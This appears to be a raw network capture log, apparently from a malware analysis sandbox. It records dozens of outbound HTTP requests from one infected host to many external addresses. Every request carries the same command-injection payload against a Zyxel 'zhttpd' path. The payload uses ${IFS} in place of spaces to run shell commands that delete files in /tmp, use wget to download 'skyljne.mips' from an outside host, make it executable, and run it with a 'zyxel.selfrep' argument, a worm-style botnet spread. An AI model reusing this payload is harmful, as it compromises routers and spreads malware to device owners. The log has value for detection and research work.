                                            Jan 14, 2024 15:50:52.679486036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7967192.168.2.2346606198.21.250.243443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.679527044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7968192.168.2.235336485.203.234.151443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.679550886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7969192.168.2.2359800203.79.126.227443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.679590940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7970192.168.2.234023861.177.51.101443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.679617882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7971192.168.2.2342828191.221.151.135443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.679624081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7972192.168.2.2358120156.83.146.108443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.679670095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7973192.168.2.2349074200.106.187.184443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.679693937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7974192.168.2.234746292.161.51.151443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.679733992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7975192.168.2.2339138150.136.224.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.679764986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7976192.168.2.234461440.154.7.23443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.679785967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7977192.168.2.233406469.163.123.115443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.679857016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7978192.168.2.234515473.116.116.40443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.679863930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7979192.168.2.2360056154.103.248.54443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.679915905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7980192.168.2.2337916147.32.248.95443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.679940939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7981192.168.2.234839665.11.244.19443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.679963112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7982192.168.2.233898292.103.37.77443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.680006027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7983192.168.2.2347408137.113.206.133443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.680037022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7984192.168.2.2359654198.16.35.150443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.680058956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7985192.168.2.2353024140.191.160.80443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.680080891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7986192.168.2.2335220138.183.41.100443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.680133104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7987192.168.2.2359762163.98.14.61443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.680170059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7988192.168.2.235111480.195.96.151443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.680191994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7989192.168.2.2342584196.142.26.62443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.680212021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7990192.168.2.234504636.111.126.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.680239916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7991192.168.2.234376492.96.114.64443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.680269003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7992192.168.2.2351138145.134.39.208443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.680301905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7993192.168.2.233370264.199.30.212443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.680303097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7994192.168.2.2357070211.203.199.211443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.680344105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7995192.168.2.2357148131.121.238.80443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.680372000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7996192.168.2.234757479.230.40.205443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.680413008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7997192.168.2.235713241.169.16.252443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.680449963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7998192.168.2.2342896208.235.97.226443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.680469036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7999192.168.2.2343562106.229.38.65443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.680501938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8000192.168.2.2339954166.207.47.91443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.680515051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8001192.168.2.235124668.154.94.168443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.680540085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8002192.168.2.23564022.79.128.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.680552006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8003192.168.2.2335164101.206.168.211443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.680582047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8004192.168.2.235808431.233.208.176443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.680593014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8005192.168.2.234403876.249.248.144443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.680634975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8006192.168.2.235959464.240.202.141443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.680677891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8007192.168.2.235572278.232.15.222443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.680715084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8008192.168.2.2355302166.209.46.157443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.680738926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8009192.168.2.2359572136.171.48.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.680752993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8010192.168.2.2356286184.90.63.220443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.680799961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8011192.168.2.2332812197.3.207.121443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.680815935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8012192.168.2.2358154158.89.123.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.687472105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8013192.168.2.234556296.200.106.91443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.687490940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8014192.168.2.234793432.151.214.229443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.687515020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8015192.168.2.233306469.222.119.195443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.687536001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8016192.168.2.2346124170.1.4.125443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.687611103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8017192.168.2.236027096.196.211.216443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.687613964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8018192.168.2.2349514150.194.182.180443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.687628984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8019192.168.2.2352322216.200.252.191443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.687681913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8020192.168.2.2344380129.132.132.137443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.687700987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8021192.168.2.2339488185.97.137.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.687760115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8022192.168.2.235022437.0.49.193443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.687781096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8023192.168.2.2352480116.119.114.14443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.687827110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8024192.168.2.233930283.57.28.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.687855959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8025192.168.2.2342632151.96.199.161443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.687882900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8026192.168.2.2334468137.40.205.97443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.687913895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8027192.168.2.2351926153.240.61.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.687918901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8028192.168.2.2347306182.76.218.178443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.687968016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8029192.168.2.234780813.55.208.0443
                                            TimestampBytes transferredDirectionData
